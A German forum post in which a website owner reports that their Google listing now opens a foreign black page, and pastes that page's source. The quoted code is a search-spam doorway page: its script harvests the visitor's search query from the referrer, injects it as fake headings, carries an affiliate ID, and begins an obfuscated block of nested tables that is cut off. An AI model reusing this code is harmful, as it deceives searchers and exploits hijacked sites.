35801

Meine Seite ist weg...

Hallo Leute...

ruft mal folgenden Link auf:
http://www.google.at/search?hl=de&q=katalog+ring%C3%B6sen&btnG= ...

Dann klickt bitte den 2. Eintrag an (Powerdruck.com - Broschüren, Kataloge, Magazine, Preislisten...)

Dann kommt Ihr auf eine schwarze Seite. DIES IST NICHT MEINE SEITE...

Woran kann das liegen bzw. wie kann ich das Problem beheben??

CODE DER FREMDEN SEITE:

<html lang="en">
<head>
<title>form lease</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="MSSmartTagsPreventParsing" content="true" />
<meta name="generator" content="Blogger" />
<META HTTP-EQUIV="Refresh" CONTENT="300"/>
<META name="keywords" content="" />

<style type="text/css">

body {
background:#000;
margin:0;
padding:40px 20px;
font:x-small "Trebuchet MS",Trebuchet,Verdana,Sans-Serif;
text-align:center;
color:#ccc;
font-size/* */:/**/small;
font-size: /**/small;
}
a:link {
color:#9ad;
}
a:visited {
color:#a7a;
text-decoration:none;
}
a:hover {
color:#ad9;
text-decoration:underline;
}
a img {
border-width:0;
}
#header {
width:660px;
margin:0 auto 10px;
border:1px solid #333;
}
#blog-title {
margin:5px 5px 0;
padding:20px 20px .25em;
border:1px solid #222;
border-width:1px 1px 0;
font-size:200%;
line-height:1.2em;
color:#ccc;
text-transform:uppercase;
letter-spacing:.2em;
}
#blog-title a {
color:#ccc;
text-decoration:none;
}
#blog-title a:hover {
color:#ad9;
}
#description {
margin:0 5px 5px;
padding:0 20px 20px;
border:1px solid #222;
border-width:0 1px 1px;
font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.2em;
color:#777;
}
#content {
width:660px;
margin:0 auto;
padding:0;
text-align:left;
}
#main {
width:410px;
float:left;
}
#sidebar {
width:220px;
float:right;
}
h2 {
margin:1.5em 0 .75em;
font:bold 78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.2em;
color:#777;
}
.date-header {
margin:1.5em 0 .5em;
}
.post {
margin:.5em 0 1.5em;
border-bottom:1px dotted #444;
padding-bottom:1.5em;
}
.post-title {
margin:.25em 0 0;
padding:0 0 4px;
font-size:140%;
line-height:1.4em;
color:#ad9;
}
.post-title a {
text-decoration:none;
color:#ad9;
}
.post-title a:hover {
color:#fff;
}
.post div {
margin:0 0 .75em;
line-height:1.6em;
}
p.post-footer {
margin:-.25em 0 0;
color:#666;
}
.post-footer em, .comment-link {
font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.1em;
}
.post-footer em {
font-style:normal;
color:#777;
margin-right:.6em;
}
.comment-link {
margin-left:.6em;
}
.post img {
padding:4px;
border:1px solid #222;
}
.post blockquote {
margin:1em 20px;
}
.post blockquote p {
margin:.75em 0;
}
#comments h4 {
margin:1em 0;
font:bold 78%/1.6em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.2em;
color:#999;
}
#comments h4 strong {
font-size:130%;
}
#comments-block {
margin:1em 0 1.5em;
line-height:1.6em;
}
#comments-block dt {
margin:.5em 0;
}
#comments-block dd {
margin:.25em 0 0;
}
#comments-block dd.comment-timestamp {
margin:-.25em 0 2em;
font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.1em;
}
#comments-block dd p {
margin:0 0 .75em;
}
.deleted-comment {
font-style:italic;
color:gray;
}
#sidebar ul {
margin:0 0 1.5em;
padding:0 0 1.5em;
border-bottom:1px dotted #444;
list-style:none;
}
#sidebar li {
margin:0;
padding:0 0 .25em 15px;
text-indent:-15px;
line-height:1.5em;
}
#sidebar p {
color:#999;
line-height:1.5em;
}
#profile-container {
margin:0 0 1.5em;
border-bottom:1px dotted #444;
padding-bottom:1.5em;
}
.profile-datablock {
margin:.5em 0 .5em;
}
.profile-img {
display:inline;
}
.profile-img img {
float:left;
padding:4px;
border:1px solid #222;
margin:0 8px 3px 0;
}
.profile-data {
margin:0;
font:bold 78%/1.6em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.1em;
}
.profile-data strong {
display:none;
}
.profile-textblock {
margin:0 0 .5em;
}
.profile-link {
margin:0;
font:78%/1.4em "Trebuchet MS",Trebuchet,Arial,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.1em;
}
#footer {
width:660px;
clear:both;
margin:0 auto;
}
#footer hr {
display:none;
}
#footer p {
margin:0;
padding-top:15px;
font:78%/1.6em "Trebuchet MS",Trebuchet,Verdana,Sans-serif;
text-transform:uppercase;
letter-spacing:.1em;
}
</style>
</head>

<body>
<div id="header">
<h1 id="blog-title">
<div id="direct_keyword1"></div>
</h1>
<p id="description">
</p>
</div>
<div id="content">
<div id="main">
<div id="main2">
<h2 class="date-header">
<div id="direct_date"></div>
</h2>
<div class="post">
<a name="115985723049422083">
</a>

<h3 class="post-title">
<div id="direct_keyword2"></div>
</h3>
<div class="post-body">
<div>
<div style="clear:both;">
</div>
<script>
function grep(a,f) {for (var i=0;i!=a.length;i++){f(a[i])}};

var x='0123456789ABCDEF';
function unhex(h) {
h=h.toUpperCase();
return 16*x.indexOf(h.charAt(0)) + x.indexOf(h.charAt(1));
}
function hex(c) {
n = parseInt(c);
return x.charAt(n>>4) + x.charAt(n&15);
}

function win (c) {
if (c == 184) return 1105;
if (c == 168) return 1025;
if (c > 191 && c < 256) return c + 848;
return c;
}

function code2UTF (c) {
var utf = "";
if (c < 128) {
utf += '%' + hex(c);
} else if ((c > 127) && (c < 2048)) {
utf += '%' + hex((c >> 6) | 192);
utf += '%' + hex((c & 63) | 128);
} else {
utf += '%' + hex((c >> 12) | 224);
utf += '%' + hex(((c >> 6) & 63) | 128);
utf += '%' + hex((c & 63) | 128);
}
return utf;
}

function encodeUTF(text, w) {
var res = '';
codes = text.split('%');
res += codes;
for (i=1; i<codes.length; i++) {
res += code2UTF(w ? win(unhex(codes[i].substr(0,2))) : unhex(codes[i].substr(0,2)));
res += codes[i].substr(2);
}
return res;
}

function myEncode(s) {
return encodeURI(s.replace(/ /g,'+')) // fuck. + not encoded
.replace(/\?/g,'%3F')
.replace(/\&/g,'%26')
.replace(/\=/g,'%3D')
.replace(/:/g ,'%3A');
};
function myDecode(s) {
return decodeURI(
s
.replace(/\+/g ,' ')
.replace(/%3A/g,':')
.replace(/%2B/g,'+')
.replace(/%3F/g,'?')
.replace(/%3D/g,'=')
.replace(/%26/g,'&')
);
};

var subaff = 187655;
var qq     = document.referrer;
var q      = 'insurance';
try {

if (qq.match(/^http:\/\/([A-Za-z0-9_-]+\.)*(yandex|rambler|aport|mail|gogo|poisk|alltheweb|fireball|freenet|abacho|wanadoo|free|club-internet|aliceadsl|alice|skynet|terra|ya|orange|clix|terravista|gratis-ting|suomi24)\.[A-Za-z0-9_-]+\//i)){
qq = encodeUTF(qq,qq.match(/^http:\/\/([A-Za-z0-9_-]+\.)?(yandex|rambler|aport|mail|gogo|poisk)\.ru\//i));
};

grep(qq.split('?')[1].split('&'),function(p){
var pair = p.split('=');
if (pair.match(/^(q|query|qs|searchfor|search_for|w|p|r|key|keywords|search_string|search_word|buscar|text|words|su|qt|rdata)$/)) q = myDecode(pair[1]);
});
}catch(e){};
</script>

<script>
with (document){
var D=new Date();
getElementById('direct_date').innerHTML=[
['Sunday','Monday','Tuesday','Wednesday','Thursday','Friday','Saturday'][D.getDay()],
[
['January','February','March','April','May','June','July','August','September','October','November','December'][D.getMonth()],
D.getDate()
].join(' '),
D.getFullYear()
].join(', ');
title=q;
getElementById('direct_keyword1').innerHTML=q;
getElementById('direct_keyword2').innerHTML = [
'Here is some latest listing of sites on which I\'ve found much about !!!!!',
'My listing of sites about !!!!!',
'Here are some my favorite sites about !!!!!',
'My favorite links about !!!!!',
'The collection of sites about !!!!!',
'The best sites I could find on the web about !!!!!',
'Sites about !!!!!',
'!!!!! listing',
'Interested in !!!!!?',
'Update of sites about !!!!!'
][Math.floor(Math.random()*10)].replace('!!!!!',q);
};
</script>

<script>
document.write("Particulary I like the first site but other sites are informative as well, so if you have interest in "+q+" you should check all those links. I hope you'll like them.");
</script>

<style>
a.ad_title_:link, a.ad_title_:visited {
font-size:1.2em;
text-decoration:none;
text-transform:none;
}
a.ad_description_:link, a.ad_description_:visited {
font-size:0.8em;
text-decoration:none;
text-transform:none;
color:#666;
}
a.ad_url_:link, a.ad_url_:visited {
display:none;
}
table.ad_table_ {
border-collapse:collapse;
}
table.ad_table_ td{
padding-left: 20px;
}

</style>
<style>#myDynamicInterface table, #myDynamicInterface table tr td {margin: 0px;padding: 0px;border: 0px;border-collapse: collapse;}</style><div id="myDynamicInterface"><table><tr><td><table><tr><td><table width=7 height=7><tr><td></td></tr></table></td><td><table width=12 height=5><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=5><tr><td></td></tr></table></td><td><table width=16 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=7><tr><td></td></tr></table></td><td><table width=6 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=0><tr><td></td></tr></table></td><td><table width=5 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=7><tr><td></td></tr></table></td><td><table width=6 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=0><tr><td></td></tr></table></td><td><table width=0 height=14><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=5><tr><td></td></tr></table></td><td><table width=5 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=2><tr><td></td></tr></table></td><td><table width=3 height=15><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=3><tr><td></td></tr></table></td><td><table width=8 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=5><tr><td></td></tr></table></td><td><table width=5 height=15><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=8><tr><td></td></tr></table></td><td><table width=5 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=3><tr><td></td></tr></table></td><td><table width=10 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=8><tr><td></td></tr></table></td><td><table width=6 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=5><tr><td></td></tr></table></td><td><table width=3 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=2><tr><td></td></tr></table></td><td><table width=0 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=9><tr><td></td></tr></table></td><td><table width=8 height=8><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=0><tr><td></td></tr></table></td><td><table width=15 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=0><tr><td></td></tr></table></td><td><table width=16 height=13><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=8><tr><td></td></tr></table></td><td><table width=4 height=5><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=3><tr><td></td></tr></table></td><td><table width=3 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=3><tr><td></td></tr></table></td><td><table width=10 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=3><tr><td></td></tr></table></td><td><table width=1 height=0><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=8 height=2><tr><td></td></tr></table></td><td><table width=5 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=5 height=1><tr><td></td></tr></table></td><td><table width=2 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=3><tr><td></td></tr></table></td><td><table width=9 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=15><tr><td></td></tr></table></td><td><table width=13 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=8><tr><td></td></tr></table></td><td><table width=3 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=4><tr><td></td></tr></table></td><td><table width=4 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=0><tr><td></td></tr></table></td><td><table width=3 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=3><tr><td></td></tr></table></td><td><table width=10 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=8><tr><td></td></tr></table></td><td><table width=5 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=0><tr><td></td></tr></table></td><td><table width=2 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=3><tr><td></td></tr></table></td><td><table width=0 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=0><tr><td></td></tr></table></td><td><table width=4 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=4><tr><td></td></tr></table></td><td><table width=4 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=2 height=2><tr><td></td></tr></table></td><td><table width=3 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=4><tr><td></td></tr></table></td><td><table width=0 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=13><tr><td></td></tr></table></td><td><table width=3 height=14><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=7><tr><td></td></tr></table></td><td><table width=5 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=7><tr><td></td></tr></table></td><td><table width=0 height=9><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=8><tr><td></td></tr></table></td><td><table width=1 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=5><tr><td></td></tr></table></td><td><table width=0 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=3><tr><td></td></tr></table></td><td><table width=13 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=11><tr><td></td></tr></table></td><td><table width=16 height=0><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=7 height=3><tr><td></td></tr></table></td><td><table width=6 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=16><tr><td></td></tr></table></td><td><table width=7 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=0><tr><td></td></tr></table></td><td><table width=6 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=6><tr><td></td></tr></table></td><td><table width=4 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=2><tr><td></td></tr></table></td><td><table width=15 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=0><tr><td></td></tr></table></td><td><table width=2 height=5><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=6 height=5><tr><td></td></tr></table></td><td><table width=4 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=1><tr><td></td></tr></table></td><td><table width=6 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=5><tr><td></td></tr></table></td><td><table width=5 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=2><tr><td></td></tr></table></td><td><table width=12 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=5 height=7><tr><td></td></tr></table></td><td><table width=13 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=0><tr><td></td></tr></table></td><td><table width=0 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=7><tr><td></td></tr></table></td><td><table width=4 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=2><tr><td></td></tr></table></td><td><table width=3 height=10><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=7><tr><td></td></tr></table></td><td><table width=0 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=12><tr><td></td></tr></table></td><td><table width=15 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=4><tr><td></td></tr></table></td><td><table width=13 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=4><tr><td></td></tr></table></td><td><table width=16 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=2><tr><td></td></tr></table></td><td><table width=16 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=14><tr><td></td></tr></table></td><td><table width=0 height=11><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=8><tr><td></td></tr></table></td><td><table width=6 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=0><tr><td></td></tr></table></td><td><table width=2 height=3><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=3 height=8><tr><td></td></tr></table></td><td><table width=8 height=6><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=3><tr><td></td></tr></table></td><td><table width=15 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=0><tr><td></td></tr></table></td><td><table width=6 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=5 height=1><tr><td></td></tr></table></td><td><table width=9 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=4><tr><td></td></tr></table></td><td><table width=16 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=2 height=0><tr><td></td></tr></table></td><td><table width=9 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=8><tr><td></td></tr></table></td><td><table width=10 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=2 height=0><tr><td></td></tr></table></td><td><table width=3 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=7><tr><td></td></tr></table></td><td><table width=12 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=14><tr><td></td></tr></table></td><td><table width=14 height=15><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=4><tr><td></td></tr></table></td><td><table width=2 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=3><tr><td></td></tr></table></td><td><table width=1 height=9><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=4><tr><td></td></tr></table></td><td><table width=1 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=5><tr><td></td></tr></table></td><td><table width=5 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=7><tr><td></td></tr></table></td><td><table width=6 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=3><tr><td></td></tr></table></td><td><table width=10 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=0><tr><td></td></tr></table></td><td><table width=1 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=4><tr><td></td></tr></table></td><td><table width=0 height=6><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=1><tr><td></td></tr></table></td><td><table width=1 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=0><tr><td></td></tr></table></td><td><table width=3 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=7><tr><td></td></tr></table></td><td><table width=4 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=5><tr><td></td></tr></table></td><td><table width=2 height=3><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=7 height=1><tr><td></td></tr></table></td><td><table width=5 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=4><tr><td></td></tr></table></td><td><table width=3 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=1><tr><td></td></tr></table></td><td><table width=1 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=2><tr><td></td></tr></table></td><td><table width=8 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=0><tr><td></td></tr></table></td><td><table width=7 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=5><tr><td></td></tr></table></td><td><table width=3 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=4><tr><td></td></tr></table></td><td><table width=0 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=1><tr><td></td></tr></table></td><td><table width=4 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=0><tr><td></td></tr></table></td><td><table width=0 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=1><tr><td></td></tr></table></td><td><table width=6 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=4><tr><td></td></tr></table></td><td><table width=5 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=2><tr><td></td></tr></table></td><td><table width=3 height=9><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=4><tr><td></td></tr></table></td><td><table width=3 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=3><tr><td></td></tr></table></td><td><table width=5 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=2><tr><td></td></tr></table></td><td><table width=3 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=6><tr><td></td></tr></table></td><td><table width=9 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=7><tr><td></td></tr></table></td><td><table width=4 height=6><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=3><tr><td></td></tr></table></td><td><table width=1 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=3><tr><td></td></tr></table></td><td><table width=5 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=3><tr><td></td></tr></table></td><td><table width=10 height=7><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=0><tr><td></td></tr></table></td><td><table width=7 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=0><tr><td></td></tr></table></td><td><table width=14 height=5><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=0 height=4><tr><td></td></tr></table></td><td><table width=3 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=3><tr><td></td></tr></table></td><td><table width=7 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=0><tr><td></td></tr></table></td><td><table width=6 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=12><tr><td></td></tr></table></td><td><table width=0 height=9><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=8><tr><td></td></tr></table></td><td><table width=3 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=5><tr><td></td></tr></table></td><td><table width=8 height=10><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=4><tr><td></td></tr></table></td><td><table width=2 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=16><tr><td></td></tr></table></td><td><table width=3 height=15><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=7><tr><td></td></tr></table></td><td><table width=14 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=0><tr><td></td></tr></table></td><td><table width=3 height=5><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=3><tr><td></td></tr></table></td><td><table width=1 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=2 height=1><tr><td></td></tr></table></td><td><table width=12 height=8><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=5><tr><td></td></tr></table></td><td><table width=10 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=4><tr><td></td></tr></table></td><td><table width=7 height=14><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=2><tr><td></td></tr></table></td><td><table width=15 height=5><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=6><tr><td></td></tr></table></td><td><table width=3 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=4><tr><td></td></tr></table></td><td><table width=16 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=4><tr><td></td></tr></table></td><td><table width=11 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=4><tr><td></td></tr></table></td><td><table width=0 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=3><tr><td></td></tr></table></td><td><table width=6 height=5><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=0 height=3><tr><td></td></tr></table></td><td><table width=0 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=9><tr><td></td></tr></table></td><td><table width=2 height=6><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=1 height=3><tr><td></td></tr></table></td><td><table width=6 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=10><tr><td></td></tr></table></td><td><table width=12 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=3><tr><td></td></tr></table></td><td><table width=4 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=7><tr><td></td></tr></table></td><td><table width=7 height=8><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=7><tr><td></td></tr></table></td><td><table width=1 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=5><tr><td></td></tr></table></td><td><table width=6 height=15><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=4><tr><td></td></tr></table></td><td><table width=14 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=14><tr><td></td></tr></table></td><td><table width=2 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=4><tr><td></td></tr></table></td><td><table width=4 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=3><tr><td></td></tr></table></td><td><table width=7 height=7><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=6 height=7><tr><td></td></tr></table></td><td><table width=5 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=6><tr><td></td></tr></table></td><td><table width=1 height=5><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=7><tr><td></td></tr></table></td><td><table width=14 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=0><tr><td></td></tr></table></td><td><table width=3 height=7><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=4><tr><td></td></tr></table></td><td><table width=7 height=0><tr><td></td></tr></table></td></tr><tr><td><table width=0 height=1><tr><td></td></tr></table></td><td><table width=2 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=5><tr><td></td></tr></table></td><td><table width=6 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=2 height=0><tr><td></td></tr></table></td><td><table width=2 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=7><tr><td></td></tr></table></td><td><table width=2 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=2><tr><td></td></tr></table></td><td><table width=0 height=3><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=7><tr><td></td></tr></table></td><td><table width=7 height=1><tr><td></td></tr></table></td></tr><tr><td><table width=6 height=1><tr><td></td></tr></table></td><td><table width=3 height=7><tr><td></td></tr></table></td></tr></table></td></tr><tr><td><table><tr><td><table width=1 height=1><tr><td></td></tr></table></td><td><table width=8 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=14><tr><td></td></tr></table></td><td><table width=6 height=0><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=8 height=3><tr><td></td></tr></table></td><td><table width=4 height=2><tr><td></td></tr></table></td></tr><tr><td><table width=4 height=12><tr><td></td></tr></table></td><td><table width=2 height=10><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=6><tr><td></td></tr></table></td><td><table width=3 height=8><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=0><tr><td></td></tr></table></td><td><table width=1 height=6><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=2 height=7><tr><td></td></tr></table></td><td><table width=7 height=4><tr><td></td></tr></table></td></tr><tr><td><table width=7 height=2><tr><td></td></tr></table></td><td><table width=4 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=2><tr><td></td></tr></table></td><td><table width=12 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=2 height=7><tr><td></td></tr></table></td><td><table width=5 height=2><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=2><tr><td></td></tr></table></td><td><table width=7 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=2 height=0><tr><td></td></tr></table></td><td><table width=6 height=8><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=7 height=8><tr><td></td></tr></table></td><td><table width=6 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=3 height=3><tr><td></td></tr></table></td><td><table width=0 height=1><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=4 height=3><tr><td></td></tr></table></td><td><table width=14 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=7><tr><td></td></tr></table></td><td><table width=5 height=4><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=0><tr><td></td></tr></table></td><td><table width=12 height=3><tr><td></td></tr></table></td></tr><tr><td><table width=1 height=8><tr><td></td></tr></table></td><td><table width=2 height=5><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=3 height=6><tr><td></td></tr></table></td><td><table width=8 height=7><tr><td></td></tr></table></td></tr><tr><td><table width=8 height=7><tr><td></td></tr></table></td><td><table width=10 height=14><tr><td></td></tr></table></td></tr></table></td><td><table><tr><td><table width=1 height=5><tr><td></td></tr></table></td><td><table width=15 